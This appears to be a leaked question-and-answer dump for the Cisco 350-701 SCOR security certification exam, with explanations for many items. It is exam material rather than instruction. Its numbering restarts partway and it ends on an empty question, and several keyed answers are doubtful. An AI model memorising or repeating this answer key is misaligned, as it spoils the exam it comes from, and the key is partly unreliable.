350-701 Dec-2022


willsonliam55@gmail.com Skype Apple Kid

Question 1

Which two protocols must be configured to authenticate end users to the Web Security Appliance? (Choose
two)

A. NTLMSSP
B. Kerberos
C. CHAP
D. TACACS+
E. RADIUS

Answer: A B

Question 2

An engineer is configuring Dropbox integration with Cisco Cloudlock. Which action must be taken before
granting API access in the Dropbox admin console?

A. Authorize Dropbox within the Platform settings in the Cisco Cloudlock portal.
B. Add Dropbox to the Cisco Cloudlock Authentication and API section in the Cisco Cloudlock portal.
C. Send an API request to Cisco Cloudlock from Dropbox admin portal.
D. Add Cisco Cloudlock to the Dropbox admin portal.

Answer: A

Question 3

What is a benefit of using Cisco Umbrella?

A. DNS queries are resolved faster.
B. Attacks can be mitigated before the application connection occurs.
C. Files are scanned for viruses before they are allowed to run.
D. It prevents malicious inbound traffic.

Answer: B

Question 3

Drag and drop the cryptographic algorithms for IPsec from the left onto the cryptographic processes on
the right.

Answer:

Authentication
+ esp-md5-hmac
+ esp-sha-hmac

Encryption
+ esp-3des
+ esp-aes-256

Explanation

esp-md5-hmac: ESP with MD5 authentication
esp-sha-hmac: ESP with SHA authentication
esp-3des: ESP with 168-bit DES encryption
esp-aes-256: ESP with the 256-bit AES encryption

Question 4

Which security solution is used for posture assessment of the endpoints in a BYOD solution?

A. Cisco FTD
B. Cisco ASA
C. Cisco Umbrella
D. Cisco ISE

Answer: D

Question 5

Which characteristic is unique to a Cisco WSAv as compared to a physical appliance?

A. supports VMware vMotion on VMware ESXi
B. requires an additional license
C. performs transparent redirection
D. supports SSL decryption

Answer: A

Question 6

What are two benefits of using an MDM solution? (Choose two)

A. grants administrators a way to remotely wipe a lost or stolen device
B. provides simple and streamlined login experience for multiple applications and users
C. native integration that helps secure applications across multiple cloud platforms or on-premises
environments
D. encrypts data that is stored on endpoints
E. allows for centralized management of endpoint device applications and configurations

Answer: A E

Question 7

What are two benefits of using Cisco Duo as an MFA solution? (Choose two)

A. grants administrators a way to remotely wipe a lost or stolen device
B. provides simple and streamlined login experience for multiple applications and users
C. native integration that helps secure applications across multiple cloud platforms or on-premises
environments
D. encrypts data that is stored on endpoints
E. allows for centralized management of endpoint device applications and configurations

Answer: B C

Question 8

What is a benefit of using GET VPN over FlexVPN within a VPN deployment?

A. GET VPN supports Remote Access VPNs
B. GET VPN natively supports MPLS and private IP networks
C. GET VPN uses multiple security associations for connections
D. GET VPN interoperates with non-Cisco devices

Answer: B

Question 9

Which solution allows an administrator to provision, monitor, and secure mobile devices on Windows and
Mac computers from a centralized dashboard?

A. Cisco Umbrella
B. Cisco AMP for Endpoints
C. Cisco ISE
D. Cisco Stealthwatch

Answer: C

Question 10

Which type of data does the Cisco Stealthwatch system collect and analyze from routers, switches, and
firewalls?

A. NTP
B. syslog
C. SNMP
D. NetFlow

Answer: D

Question 11

What is the term for the concept of limiting communication between applications or containers on the
same node?

A. container orchestration
B. software-defined access
C. microservicing
D. microsegmentation

Answer: D

Explanation

Microservices are about dissecting applications to smaller units and run those units independently
instead of running them in a monolithic application. But this question asks about communication between
applications so “microservicing” is not correct.

Micro-segmentation is a network security technique that isolates different workloads from one another
within a data center. A workload can be broadly defined as the resources and processes needed to run an
application. Hosts, virtual machines and containers are a few examples of workloads.

Question 12

What is a characteristic of an EDR solution and not of an EPP solution?

A. stops all ransomware attacks
B. retrospective analysis
C. decrypts SSL traffic for better visibility
D. performs signature-based detection

Answer: B

Question 13

Drag and drop the security solutions from the left onto the benefits they provide on the right.

Answer:

+ detection, blocking, tracking, analysis, and remediation to protect the enterprise against
targeted and persistent malware attacks: Cisco AMP for Endpoints
+ policy enforcement based on complete visibility of users, mobile devices, client-side
applications, communication between virtual machines, vulnerabilities, threats, and URLs: Full
contextual awareness
+ unmatched security and web reputation intelligence provides real-time threat intelligence
and security protection: Collective Security Intelligence
+ superior threat prevention and mitigation for known and unknown threats: NGIPS

Question 14

Based on the NIST 800-145 guide, which cloud architecture may be owned, managed, and operated by
one or more of the organizations in the community, a third party, or some combination of them, and it
may exist on or off premises?

A. hybrid cloud
B. private cloud
C. public cloud
D. community cloud

Answer: D

Question 15

How does Cisco AMP for Endpoints provide next-generation protection?

A. It encrypts data on user endpoints to protect against ransomware.
B. It leverages an endpoint protection platform and endpoint detection and response.
C. It utilizes Cisco pxGrid, which allows Cisco AMP to pull threat feeds from threat intelligence centers.
D. It integrates with Cisco FTD devices.

Answer: B

Question 16

A company has 5000 Windows users on its campus. Which two precautions should IT take to prevent
WannaCry ransomware from spreading to all clients? (Choose two)

A. Segment different departments to different IP blocks and enable Dynamic ARP inspection on all VLANs
B. Ensure that noncompliant endpoints are segmented off to contain any potential damage.
C. Ensure that a user cannot enter the network of another department.
D. Perform a posture check to allow only network access to those Windows devices that are already
patched.
E. Put all company users in the trusted segment of NGFW and put all servers to the DMZ segment of the
Cisco NGFW.

Answer: B D

Question 17

What are two characteristics of the RESTful architecture used within Cisco DNA Center? (Choose two)

A. REST uses methods such as GET, PUT, POST, and DELETE.
B. REST codes can be compiled with any programming language.
C. REST is a Linux platform-based architecture.
D. The POST action replaces existing data at the URL path.
E. REST uses HTTP to send a request to a web service.

Answer: A E

Question 18

What is the process in DevSecOps where all changes in the central code repository are merged and
synchronized?

A. CD
B. EP
C. CI
D. QA

Answer: C

Question 19

Which Cisco platform onboards the endpoint and can issue a CA signed certificate while also automatically
configuring endpoint network settings to use the signed endpoint certificate, allowing the endpoint to gain
network access?

A. Cisco ISE
B. Cisco NAC
C. Cisco TACACS+
D. Cisco WSA

Answer: A

Question 20

Which cloud service offering allows customers to access a web application that is being hosted, managed,
and maintained by a cloud service provider?

A. IaC
B. SaaS
C. IaaS
D. PaaS

Answer: B

Question 21

How does Cisco Workload Optimization portion of the network do EPP solutions solely performance issues?

A. It deploys an AWS Lambda system
B. It automates resource resizing
C. It optimizes a flow path
D. It sets up a workload forensic score

Answer: B

Question 22

Email security has become a high priority task for a security engineer at a large multinational
organization due to ongoing phishing campaigns. To help control this, the engineer has deployed an
Incoming Content Filter with a URL reputation of (-10.00 to -6.00) on the Cisco ESA. Which action will the
system perform to disable any links in messages that match the filter?

A. Defang
B. Quarantine
C. FilterAction
D. ScreenAction

Answer: A

Question 23

What are two workload security models? (Choose two)

A. SaaS
B. IaaS
C. on-premises
D. off-premises
E. PaaS

Answer: C D

Question 24

Which API method and required attribute are used to add a device into DNAC with the native API?

A. lastSyncTime and pid
B. POST and name
C. userSudiSerialNos and deviceInfo
D. GET and serialNumber

Answer: B

Question 25

What provides total management for mobile and PC including managing inventory and device tracking,
remote view, and live troubleshooting using the included native remote desktop support?

A. mobile device management
B. mobile content management
C. mobile application management
D. mobile access management

Answer: A

Question 26

What is the most common type of data exfiltration that organizations currently experience?

A. HTTPS file upload site
B. Microsoft Windows network shares
C. SQL database injections
D. encrypted SMTP

Answer: A

Question 27

An administrator is configuring NTP on Cisco ASA via ASDM and needs to ensure that rogue NTP servers
cannot insert themselves as the authoritative time source. Which two steps must be taken to accomplish
this task? (Choose two)

A. Specify the NTP version
B. Configure the NTP stratum
C. Set the authentication key
D. Choose the interface for syncing to the NTP server
E. Set the NTP DNS hostname

Answer: C D

Explanation

Step 3 Enter the NTP server IPv4 IP Address.
You cannot enter a hostname for the server; the ASA does not support DNS lookup for the NTP server ->
Answer E is not correct.

Step 5 (Optional) Choose the Interface from the drop-down list.
This setting specifies the outgoing interface for NTP packets. If the interface is blank, then the ASA uses
the default admin context interface according to the management routing table.

Step 6 (Optional) Configure NTP authentication.

Reference: https://www.cisco.com/c/en/us/td/docs/security/asa/asa98/asdm78/general/asdm-78-general-config/basic-hostname-pw.html

Question 28

Which two criteria must a certificate meet before the WSA uses it to decrypt application traffic? (Choose
two)

A. It must include the current date.
B. It must reside in the trusted store of the WSA.
C. It must reside in the trusted store of the endpoint.
D. It must have been signed by an internal CA.
E. It must contain a SAN.

Answer: A B

Question 29

DoS attacks are categorized as what?

A. phishing attacks
B. flood attacks
C. virus attacks
D. trojan attacks

Answer: B

Question 30

Which Cisco solution integrates Encrypted Traffic Analytics to perform enhanced visibility, promote
compliance, shorten response times, and provide administrators with the information needed to provide
educated and automated decisions to secure the environment?

A. Cisco SDN
B. Cisco ISE
C. Cisco Security Compliance Solution
D. Cisco DNA Center

Answer: D

Explanation

Recently announced at the June 2017 Cisco Live Event, Encrypted Traffic Analytics will be built into the
Cisco DNA Center (the single window UI for Cisco APIC-EM) and will provide the ability to detect encrypted
malware throughout your enterprise network.

Reference: https://www.linkedin.com/pulse/understanding-ciscos-new-anti-malware-tech-eta-austin-emuang-stubbs

Question 31

Which Cisco security solution stops exfiltration using HTTPS?

A. Cisco CTA
B. Cisco AnyConnect
C. Cisco FTD
D. Cisco ASA

Answer: A

Explanation

Attackers often try to exfiltrate sensitive data, including credentials, using HTTP and HTTPS requests
themselves. Cognitive Threat Analytics uses multiple indications of compromise (IOCs), including global
statistics and local anomaly scores, to reliably distinguish malicious tunneling from benign use of the
technique.

Reference: https://www.cisco.com/c/dam/en/us/products/collateral/security/cognitive-threat-analytics/at-a-glance-c45-736555.pdf

Question 32

What is a functional difference between Cisco AMP for Endpoints and Cisco Umbrella Roaming Client?

A. The Umbrella Roaming client stops and tracks malicious activity on hosts, and AMP for Endpoints tracks
only URL-based threats.
B. The Umbrella Roaming Client authenticates users and provides segmentation, and AMP for Endpoints
allows only for VPN connectivity
C. AMP for Endpoints authenticates users and provides segmentation, and the Umbrella Roaming Client
allows only for VPN connectivity.
D. AMP for Endpoints stops and tracks malicious activity on hosts, and the Umbrella Roaming Client tracks
only URL-based threats.

Answer: D

Explanation

Cisco Advanced Malware Protection (AMP) for Endpoints is a malware and virus protection platform that
you can use to protect your environment from intrusion, infected files, and malicious behavior.

Question 33

What is a benefit of flexible NetFlow records?

A. They have customized traffic identification
B. They are used for accounting
C. They monitor a packet from Layer 2 to Layer 5
D. They are used for security

Answer: A

Explanation

Key Advantages to using Flexible NetFlow:

+ Flexibility, scalability of flow data beyond traditional NetFlow
+ The ability to monitor a wider range of packet information producing new information about network
behavior not available today
+ Enhanced network anomaly and security detection
+ User configurable flow information to perform customized traffic identification and the ability to focus
and monitor specific network behavior (-> Therefore answer A is correct)

Reference: https://www.cisco.com/c/en/us/products/collateral/ios-nx-os-software/flexible-netflow/product_data_sheet0900aecd804b590b.html

Question 34

An engineer recently completed the system setup on a Cisco WSA. Which URL information does the system
send to SensorBase Network servers?

A. Summarized server-name information and MD5-hashed path information
B. none because SensorBase Network Participation is disabled by default
C. URL information collected from clients that connect to the Cisco WSA using Cisco AnyConnect
D. complete URL, without obfuscating the path segments

Answer: D

Explanation

Note: Standard SensorBase Network Participation is enabled by default during system setup -> Answer B
is not correct.

Enabling Participation in The Cisco SensorBase Network

Step 1. Choose Security Services > SensorBase.
Step 2. Verify that SensorBase Network Participation is enabled. When it is disabled, none of the data that
the appliance collects is sent back to the SensorBase Network servers.
Step 3. In the Participation Level section, choose one of the following levels:
+ Limited. Basic participation summarizes server name information and sends MD5-hashed path
segments to the SensorBase Network servers.
+ Standard. Enhanced participation sends the entire URL with unobfuscated path segments to the
SensorBase Network servers. This option assists in providing a more robust database, and continually
improves the integrity of Web Reputation Scores.

Reference: https://www.cisco.com/c/en/us/td/docs/security/wsa/wsa11-5/user_guide/b_WSA_UserGuide_11_5_1/b_WSA_UserGuide_11_5_1_chapter_00.pdf

The “Standard” SensorBase Network Participation is enabled by default during system setup so this
question implies we are using standard level, not Limited level -> Answer D is correct while answer A is
not correct.

Question 35

What is the purpose of the Cisco Endpoint IoC feature?

A. It is an incident response tool
B. It provides precompromise detection
C. It is a signature-based engine
D. It provides stealth threat prevention

Answer: A

Explanation

The Endpoint Indication of Compromise (IOC) feature is a powerful incident response tool for scanning of
post-compromise indicators across multiple computers.

Reference: https://docs.amp.cisco.com/Cisco%20Endpoint%20IOC%20Attributes.pdf

Question 36

Which Cisco DNA Center RESTful PNP API adds and claims a device into a workflow?

A. api/v1/fie/config
B. api/v1/onboarding/workflow
C. api/v1/onboarding/pnp-device
D. api/v1/onboarding/pnp-device/import

Answer: D

Explanation

The Device Onboarding API supports the PnP process, giving the developer the option to create a workflow
that detects when a device joins the network and communicates with Cisco DNA Center, and then sending
the onboarding configuration to the device.
This API is composed of 28 endpoints, that can be used to manage workflows, include devices in the PnP
Process, claim devices, amongst other things.

Python script:
# Intent API path of the PnP device import endpoint (adds and claims devices)
ONBOARDING_PNP_IMPORT_URL = '/dna/intent/api/v1/onboarding/pnp-device/import'

Reference: https://developer.cisco.com/docs/dna-center/#!device-onboarding/onboarding-pnp-api

Question 37

What does endpoint isolation in Cisco AMP for Endpoints security protect from?

A. a malware spreading across the user device
B. an infection spreading across the network
C. an infection spreading across the LDAP or Active Directory domain from a user account
D. a malware spreading across the LDAP or Active Directory domain from a user account

Answer: A

Question 38

An engineer is deploying Cisco Advanced Malware Protection (AMP) for Endpoints and wants to create a
policy that prevents users from executing file named abc424952615.exe without quarantining that file.
What type of Outbreak Control list must the SHA-256 hash value for the file be added to in order to
accomplish this?

A. Advanced Custom Detection
B. Blocked Application
C. Simple Custom Detection
D. Isolation

Answer: B

Explanation

A Simple Custom Detection list is similar to a blacklist. These are files that you want to detect and
quarantine. Not only will an entry in a Simple Custom Detection list quarantine future files, but through
Retrospective it will quarantine instances of the file on any endpoints in your organization that the service
has already seen it on -> Answer C is not correct.

Application Control – Blocked Applications

A blocked applications list is composed of files that you do not want to allow users to execute but do not
want to quarantine. You may want to use this for files you are not sure are malware, unauthorized
applications, or you may want to use this to stop applications with vulnerabilities from executing until a
patch has been released.

Reference: https://docs.amp.cisco.com/en/SecureEndpoint/Secure%20Endpoint%20User%20Guide.pdf

Question 39

Which feature does the IaaS model provide?

A. granular control of data
B. software-defined network segmentation
C. dedicated, restricted workstations
D. automatic updates and patching of software

Answer: C

Explanation

In the infrastructure-as-a-service (IaaS) model, the subscriber leases just the hardware infrastructure
(networking, data center space, storage, servers, and virtualization services), but establishes and
maintains all other components of the technology stack (applications, data, runtime, middleware,
operating systems, etc.).

Question 40

Which VMware platform does Cisco ACI integrate with to provide enhanced visibility, provide policy
integration and deployment, and implement security policies with access lists?

A. VMware APIC
B. VMware vRealize
C. VMware fusion
D. VMware horizons

Answer: B

Question 41

Which two capabilities does an MDM provide? (Choose two)

A. delivery of network malware reports to an inbox in a schedule
B. unified management of mobile devices, Macs, and PCs from a centralized dashboard
C. enforcement of device security policies from a centralized dashboard
D. manual identification and classification of client devices
E. unified management of Android and Apple devices from a centralized dashboard

Answer: B C

Question 42

What are two recommended approaches to stop DNS tunneling for data exfiltration and command and
control call backs? (Choose two)

A. Use intrusion prevention system.
B. Block all TXT DNS records.
C. Enforce security over port 53.
D. Use next generation firewalls.
E. Use Cisco Umbrella.

Answer: C E

Question 43

In which two ways does the Cisco Advanced Phishing Protection solution protect users? (Choose two)

A. It prevents use of compromised accounts and social engineering.
B. It prevents all zero-day attacks coming from the Internet.
C. It automatically removes malicious emails from users’ inbox.
D. It prevents trojan horse malware using sensors.
E. It secures all passwords that are shared in video conferences.

Answer: B C

Question 44

Which capability is provided by application visibility and control?

A. reputation filtering
B. data obfuscation
C. data encryption
D. deep packet inspection

Answer: D

Question 45

An organization is implementing AAA for their users. They need to ensure that authorization is verified for
every command that is being entered by the network administrator. Which protocol must be configured in
order to provide this capability?

A. EAPOL
B. SSH
C. RADIUS
D. TACACS+

Answer: D

Question 46

Drag and drop the deployment models from the left onto the explanations on the right.

Answer:

+ A GRE tunnel is utilized in this solution: passive with ERSPAN
+ Attacks are not prevented with this solution: passive
+ This solution allows inspection between hosts on the same subnet: transparent
+ This solution does not provide filtering between hosts on the same subnet: routed

Explanation

Monitoring (passive) mode is the mode where the Cisco NGFW or NGIPS device does not usually prevent
attacks. The device uses one interface to silently inspect traffic and identify malicious activity without
interrupting traffic flow.

Passive with ERSPAN Mode: You can configure one physical interface operating as a sniffer – very
similar to a traditional remote intrusion detection system (IDS). A Generic Routing Encapsulation (GRE)
tunnel between the capture point and the Cisco FTD carries the packets to be inspected.

Reference: CCNP and CCIE Security Core SCOR 350-701 Official Cert Guide

Question 47

When network telemetry is implemented, what is important to be enabled across all network infrastructure
devices to correlate different sources?

A. CDP
B. NTP
C. syslog
D. DNS

Answer: B

Question 48

What is the difference between EPP and EDR?

A. EPP focuses primarily on threats that have evaded front-line defenses that entered the environment.
B. Having an EPP solution allows an engineer to detect, investigate, and remediate modern threats.
C. EDR focuses solely on prevention at the perimeter.
D. Having an EDR solution gives an engineer the capability to flag offending files at the first sign of
malicious behavior.

Answer: D

Explanation

EPP (Endpoint Protection Platform) covers traditional anti-malware scanning, whereas EDR (Endpoint
Detection and Response) covers some more advanced capabilities like detecting and investigating security
incidents, and ability to remediate endpoints to pre-infection state.

Reference: https://www.sans.org/webcasts/epp-edr-both-choose-generation-endpoint-security-109470/

EDR focuses primarily on threats that have evaded front-line defenses and entered into your environment.
An endpoint protection platform, however, focuses solely on prevention -> Answer A and answer C are not
correct.

An EPP can often be described as a traditional anti-virus solution. While deploying an anti-virus solution
will improve your front-line security, it does not protect your endpoints from more sophisticated threats
that may find a way into your network. Endpoint security solutions should have endpoint protection
platform capabilities, but they must also have the capabilities of an endpoint detection and response
solution -> Answer B is not correct.

Reference: https://www.cisco.com/c/en/us/products/security/what-is-endpoint-protection-platform.html

Question 49

An engineer is adding a Cisco router to an existing environment. NTP authentication is configured on all
devices in the environment with the command ntp authentication-key 1 md5 Clsc427128380. There
are two routers on the network that are configured as NTP servers for redundancy, 192.168.1.110 and
192.168.1.111. 192.168.1.110 is configured as the authoritative time source. What command must be
configured on the new router to use 192.168.1.110 as its primary time source without the new router
attempting to offer time to existing devices?

A. ntp server 192.168.1.110 key 1 prefer
B. ntp peer 192.168.1.110 prefer key 1
C. ntp server 192.168.1.110 primary key 1
D. ntp peer 192.168.1.110 key 1 primary

Answer: A

Explanation

A router can be configured to prefer an NTP source over another. A preferred server’s responses are
discarded only if they vary dramatically from the other time sources. Otherwise, the preferred server is
used for synchronization without consideration of the other time sources. Preferred servers are usually
specified when they are known to be extremely accurate. To specify a preferred server, use
the prefer keyword appended to the ntp server command.

Question 50

Which algorithm is an NGE hash function?

A. HMAC
B. SHA-1
C. MD5
D. SHA-2

Answer: D

===================================== New Questions (added on 19th-Oct-2022) =====================================

Question 51

A university policy must allow open access to resources on the Internet for research, but internal
workstations are exposed to malware. Which Cisco AMP feature allows the engineering team to determine
whether a file is installed on a selected few workstations?

A. file prevalence
B. file discovery
C. file conviction
D. file manager

Answer: A

Explanation

Prevalence: AMP displays all files that are running across your organization, ordered by prevalence (from
lowest to highest number of instances), to help you surface previously undetected threats seen by a small
number of users. Files opened by only a few users may be malicious.

Reference: https://cstor.com/wp-content/uploads/2016/10/Cisco_Advanced-Malware-Protection-for-Endpoints_Data-Sheet.pdf

Question 52

During a recent security audit, a Cisco IOS router with a working IPSEC configuration using IKEv1 was
flagged for using a wildcard mask with the crypto isakmp key command. The VPN peer is a SOHO router
with a dynamically assigned IP address. Dynamic DNS has been configured on the SOHO router to map
the dynamic IP address to the host name of vpn.sohoroutercompany.com. In addition to the
command crypto isakmp key Cisc123456789 hostname vpn.sohoroutercompany.com, what other
two commands are now required on the Cisco IOS router for the VPN to continue to function after the
wildcard command is removed? (Choose two)

A. ip host vpn.sohoroutercompany.com <VPN Peer IP Address>
B. crypto isakmp identity hostname
C. Add the dynamic keyword to the existing crypto map command
D. fqdn vpn.sohoroutercompany.com <VPN Peer IP Address>
E. ip name-server <DNS Server IP Address>

Answer: A B

Explanation

The command “crypto isakmp identity hostname” configures the identity of the ISAKMP peer to the host
name concatenated with the domain name (fully qualified domain name for example,
myhost.domain.com).

If you use the host name identity method, you may need to specify the host name for the remote peer if a
DNS server is not available for name resolution. An example of this follows:
RouterA(config)# ip host RouterB.domain.com 172.30.2.2

Reference: https://www.ccexpert.us/bcran/step-3configure-isakmp-identity.html

Question 53

Which command is used to log all events to a destination collector 209.165.201.10?

A. CiscoASA(config-pmap-c)# flow-export event-type all destination 209.165.201.10
B. CiscoASA(config-cmap)# flow-export event-type flow-update destination 209.165.201.10
C. CiscoASA(config-pmap-c)# flow-export event-type flow-update destination 209.165.201.10
D. CiscoASA(config-cmap)# flow-export event-type all destination 209.165.201.10

Answer: A

Explanation

This example shows how to configure NetFlow for ASA:

ASA(config)# access-list netflow-export extended permit ip any any
ASA(config)# flow-export destination inside 172.16.1.100 9996
ASA(config)# flow-export template timeout-rate 1
ASA(config)# flow-export delay flow-create 60
ASA(config)# class-map netflow-export-class
ASA(config-cmap)# match access-list netflow-export
ASA(config)# policy-map global_policy
ASA(config-pmap)# class netflow-export-class
ASA(config-pmap-c)# flow-export event-type all destination 172.16.1.100 // export all event log types to 172.16.1.100

============================= New Questions (added on 24th-Nov-2022) =============================

Question 54

A company identified a phishing vulnerability during a pentest. What are two ways the company can
protect employees from the attack? (Choose two)

A. using Cisco ISE
B. using Cisco FTD
C. using an inline IPS/IDS in the network
D. using Cisco ESA
E. using Cisco Umbrella

Answer: D E

Explanation

The following are the benefits of deploying Cisco Advanced Phishing Protection on the Cisco Email
Security Gateway (ESA):

Prevents the following:
+ Attacks that use compromised accounts and social engineering.
+ Phishing, ransomware, zero-day attacks and spoofing.
+ BEC with no malicious payload or URL.

Reference: https://www.cisco.com/c/en/us/td/docs/security/esa/esa13-5/user_guide/b_ESA_Admin_Guide_13-5/m_advanced_phishing_protection.html

Cisco Umbrella protects users from accessing malicious domains by proactively analyzing and blocking
unsafe destinations – before a connection is ever made. Thus it can protect from phishing attacks by
blocking suspicious domains when users click on the given links that an attacker sent.

Question 55

Which feature is used in a push model to allow for session identification, host reauthentication, and session
termination?

A. CoA request
B. AAA attributes
C. carrier-grade NAT
D. AV pair

Answer: A

Explanation

The Cisco software supports the RADIUS CoA request defined in RFC 5176 that is used in a push model,
in which the request originates from the external server to the device attached to the network, and
enables the dynamic reconfiguring of sessions from external authentication, authorization, and accounting
(AAA) or policy servers.

Use the following per-session CoA requests:

– Session reauthentication
– Session termination
– Session termination with port shutdown
– Session termination with port bounce
– Security and Password Accounting

Question 56

What are the components of endpoint protection against social engineering attacks?

A. firewall
B. IDS
C. IPsec
D. ESA

Answer: D

Question 57

A company recently discovered an attack propagating throughout their Windows network via a file named
abc4350G8l99xyz.exe. The malicious file was uploaded to a Simple Custom Detection list in the AMP for
Endpoints Portal and the currently applied policy for the Windows clients was updated to reference the
detection list. Verification testing scans on known infected systems shows that AMP for Endpoints is not
detecting the presence of this file as an indicator of compromise. What must be performed to ensure
detection of the malicious file?

A. Upload the malicious file to the Blocked Application Control List
B. Use an Advanced Custom Detection list instead of a Simple Custom Detection List
C. Check the box in the policy configuration to send the file to Cisco Threat Grid for dynamic analysis
D. Upload the SHA-256 hash for the file to the Simple Custom Detection List

Answer: D

Explanation

We can upload the SHA-256 hash of this file to the Simple Custom Detection List so that AMP for
Endpoints can block it.

Reference: https://www.cisco.com/c/en/us/support/docs/security/amp-endpoints/215176-configure-a-
simple-custom-detection-list.pdf

Question 1

Which function is performed by certificate authorities but is a limitation of registration authorities?

A. CRL publishing
B. verifying user identity
C. certificate re-enrollment
D. accepts enrollment requests

Answer: A

Explanation

A Registration Authority (RA) is an authority in a network that verifies user requests for a digital certificate
and tells the Certificate Authority (CA) to issue it. RAs are part of a public key infrastructure (PKI), a
networked system that enables companies and users to exchange information and money safely and
securely.

Certificate revocation list (CRL): This is a list of certificates, based on their serial numbers, that had
initially been issued by a CA but have since been revoked and as a result should not be trusted.

Question 2

Which encryption algorithm provides highly secure VPN communications?

A. DES
B. 3DES
C. AES 256
D. AES 128

Answer: C

Question 3

A hacker initiated a social engineering attack and stole the usernames and passwords of some users within a
company. Which product should be used as a solution to this problem?

A. Cisco NGFW
B. Cisco AMP for Endpoints
C. Cisco Duo
D. Cisco AnyConnect

Answer: C

Question 4

How does a WCCP-configured router identify if the Cisco WSA is functional?

A. If an ICMP ping fails three consecutive times between a router and the WSA, traffic is no longer
transmitted to the router.
B. If an ICMP ping fails three consecutive times between a router and the WSA, traffic is no longer
transmitted to the WSA.
C. The router sends a Here-I-Am message every 10 seconds, and the WSA acknowledges with an I-See-
You message.
D. The WSA sends a Here-I-Am message every 10 seconds, and the router acknowledges with an I-See-
You message.

Answer: D

Explanation

If WCCP proxy health checking is enabled, the WSA’s WCCP daemon sends a proxy health check message
(xmlrpc client request) to the xmlrpc server running on the Web proxy every 10 seconds. If the proxy is
up and running, the WCCP service receives a response from the proxy and the WSA sends a WCCP “here I
am” (HIA) message to the specified WCCP-enabled routers every 10 seconds. If the WCCP service doesn’t
receive a reply from the proxy, then HIA messages are not sent to the WCCP routers.

After a WCCP router misses three consecutive HIA messages, the router removes the WSA from its service
group and traffic is no longer forwarded to the WSA.

Reference: https://www.cisco.com/c/en/us/td/docs/security/wsa/wsa11-
0/user_guide/b_WSA_UserGuide/b_WSA_UserGuide_chapter_0111.html

Question 5

What is a feature of NetFlow Secure Event Logging?

A. It exports only records that indicate significant events in a flow.
B. It supports v5 and v8 templates.
C. It filters NSEL events based on the traffic and event type through RSVP.
D. It delivers data records to NSEL collectors through NetFlow over TCP only.

Answer: A

Explanation

The ASA and ASASM implementations of NSEL provide a stateful, IP flow tracking method that exports
only those records that indicate significant events in a flow -> Answer A is correct.

The ASA and ASASM implementations of NSEL provide the following major functions:

+ Tracks configured NSEL collectors and delivers templates and data records to these configured NSEL
collectors through NetFlow over UDP only -> Answer D is not correct.
+ Filters NSEL events based on the traffic and event type through Modular Policy Framework, then sends
records to different collectors -> Answer C is not correct.

Reference: https://www.cisco.com/c/en/us/td/docs/security/asa/asa91/asdm71/general/asdm_71_general
_config/monitor_nsel.pdf

Only NSEL version 9 supports templates -> Answer B is not correct.

Question 6

An administrator needs to configure the Cisco ASA via ASDM such that the network management system
can actively monitor the host using SNMPv3. Which two tasks must be performed for this configuration?
(Choose two)

A. Specify the SNMP manager and UDP port.
B. Specify a community string.
C. Add an SNMP USM entry.
D. Add an SNMP host access entry.
E. Specify an SNMP user group.

Answer: A D

Explanation

This is how to configure SNMP on your Cisco ASA using ASDM (the screenshots from the original are not
reproduced here): first navigate to the SNMP configuration screen, then click the Add button to open the
window for adding an entry.

Question 7

Which technology enables integration between Cisco ISE and other platforms to gather and share network
and vulnerability data and SIEM and location information?

A. pxGrid
B. SNMP
C. NetFlow
D. Cisco Talos

Answer: A

Explanation

Cisco ISE uses Cisco Platform Exchange Grid (pxGrid) technology to share contextual data with leading
SIEM and TD partner solutions.

Reference: https://www.cisco.com/c/en/us/products/collateral/security/identity-services-engine/at-a-
glance-c45-732858.html

Question 8

A large organization wants to deploy a security appliance in the public cloud to form a site-to-site VPN and
link the public cloud environment to the private cloud in the headquarters data center. Which Cisco
security appliance meets these requirements?

A. Cisco Cloud Orchestrator
B. Cisco Stealthwatch Cloud
C. Cisco ASAv
D. Cisco WSAv

Answer: C

Question 9

What is a benefit of using Cisco Tetration?

A. It collects policy compliance data and process details.
B. It collects telemetry data from servers and then uses software sensors to analyze flow information.
C. It collects near-real time data from servers and inventories the software packages that exist on servers.
D. It collects enforcement data from servers and collects interpacket variation.

Answer: C

Explanation

Cisco Secure Workload (formerly Tetration) collects packet header metadata, process details and installed
software package information. This is collected via the software sensors deployed on the workloads and
made available as part of the solution. More detailed information is available in the Cisco Secure Workload
product documentation. Below are the high-level details regarding the telemetry data that is collected by
Cisco Secure Workload:
+ Flow information: Contains details about flow endpoints, protocols, and ports, when the flow started,
how long the flow was active, etc.
+ Inter-packet variation: Captures any inter-packet variations seen within the flow, including variations in
the packet's Time to Live (TTL), IP/TCP flags, packet length, etc.
+ Process details: Captures processes executed on the server, including information about process
parameters, start and stop time, process binary hash, etc.
+ Software packages: Inventory of all software packages installed on the server along with the version
and publisher information
+ Cisco Secure Workload forensics capability: If a customer turns on the Cisco Secure Workload forensics
capability, additional Personally Identifiable Information may be collected.

Reference: https://trustportal.cisco.com/c/dam/r/ctp/docs/privacydatasheet/security/cisco-tetration-
privacy-data-sheet.pdf

Question 10

Which standard is used to automate exchanging cyber threat information?

A. IoC
B. TAXII
C. MITRE
D. STIX

Answer: B

Explanation

Structured Threat Information Expression (STIX) and Trusted Automated Exchange of Intelligence
Information (TAXII) are standards developed in an effort to improve the prevention and mitigation of
cyber-attacks. STIX states the “what” of threat intelligence, while TAXII defines “how” that information is
relayed. Unlike previous methods of sharing, STIX and TAXII are machine-readable and therefore easily
automated.

TAXII is the best answer here because it is the standard that defines the automated exchange itself (Trusted
Automated Exchange of Intelligence Information), whereas STIX only describes the content being exchanged.

Question 11

Which security solution uses NetFlow to provide visibility across the network, data center, branch offices,
and cloud?

A. Cisco Encrypted Traffic Analytics
B. Cisco CTA
C. Cisco Umbrella
D. Cisco Stealthwatch

Answer: D

Question 12

An email administrator is setting up a new Cisco ESA. The administrator wants to enable the blocking of
greymail for the end user. Which feature must the administrator enable first?

A. IP Reputation Filtering
B. Anti-Virus Filtering
C. File Analysis
D. Intelligent Multi-Scan

Answer: D

Explanation

For graymail detection, anti-spam scanning must be enabled globally. This can be either the IronPort Anti-
Spam, the Intelligent Multi-Scan feature, or Outbreak Filters.

Reference: https://www.cisco.com/c/en/us/td/docs/security/esa/esa12-
0/user_guide/b_ESA_Admin_Guide_12_0/b_ESA_Admin_Guide_chapter_01101.html

Question 13

Drag and drop the exploits from the left onto the type of security vulnerability on the right.

Answer:

path traversal: gives unauthorized access to web server files
cross-site request forgery: makes the client the target of attack
SQL injection: accesses or modifies application data
buffer overflow: causes memory access errors

Explanation

The directory traversal/path traversal attack (also known as dot dot slash attack) is an HTTP exploit that
allows an attacker to access restricted files, directories and commands that reside outside the web server’s
root directory.

Question 14

